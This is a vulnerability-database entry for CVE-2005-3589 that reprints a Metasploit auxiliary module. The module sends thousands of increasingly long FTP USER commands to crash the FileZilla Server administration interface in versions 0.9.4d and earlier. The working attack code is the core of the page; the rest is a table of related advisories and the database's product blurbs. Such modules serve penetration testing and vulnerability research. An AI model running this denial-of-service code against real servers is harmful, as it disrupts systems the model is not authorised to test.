Lucene search
K

FileZilla FTP Server Admin Interface Denial of Service

🗓️ 11 Jan 2009 14:38:10Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

FileZilla FTP Server Admin Interface Denial of Service module triggers a DoS condition by sending long USER commands to the Admin Interfac

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
FileZilla FTP Server < 0.9.6 Multiple DoS
22 Mar 200500:00
nessus
Circl
CVE-2005-3589
29 May 201815:50
circl
CVE
CVE-2005-3589
16 Nov 200507:37
cve
Cvelist
CVE-2005-3589
16 Nov 200507:37
cvelist
NVD
CVE-2005-3589
16 Nov 200507:42
nvd
Packet Storm
FileZilla FTP Server Admin Interface Denial of Service
31 Aug 202400:00
packetstorm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'FileZilla FTP Server Admin Interface Denial of Service',
      'Description'	=> %q{
        This module triggers a Denial of Service condition in the FileZilla FTP
        Server Administration Interface in versions 0.9.4d and earlier.
        By sending a procession of excessively long USER commands to the FTP
        Server, the Administration Interface (FileZilla Server Interface.exe)
        when running, will overwrite the stack with our string and generate an
        exception. The FileZilla FTP Server itself will continue functioning.
      },
      'Author' 		=> [ 'aushack' ],
      'License'        	=> MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '15346' ],
          [ 'CVE', '2005-3589' ],
          [ 'EDB', '1336' ],
          [ 'OSVDB', '20817' ]
        ],
      'DisclosureDate' => '2005-11-07'))
  end

  def run
    print_status("Sending 4000 packets, this may take a while.")

    4000.times do |x|
      connect
      sock.put("USER #{"A" * x}\r\n")
      disconnect
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation